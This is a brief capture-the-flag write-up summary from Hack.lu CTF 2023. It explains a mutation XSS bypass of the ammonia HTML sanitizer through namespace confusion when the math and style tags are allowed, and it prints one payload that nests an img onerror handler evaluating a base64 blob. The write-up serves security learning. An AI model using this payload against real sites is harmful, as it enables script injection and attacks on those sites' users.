Tags: mxss

Rating: 5.0

tl;dr

  • XSS + HTML sanitization library (ammonia) bypass
  • Namespace confusion in ammonia when custom extra tags (math & style) are allowed
<math><annotation-xml encoding="text/html"><style><img src=x onerror="eval(atob(`<base64 payload>`))"></style></annotation-xml></math>
Original writeup (https://blog.bi0s.in/2023/10/16/Web/awesomenotes-2-HackluCTF2023/).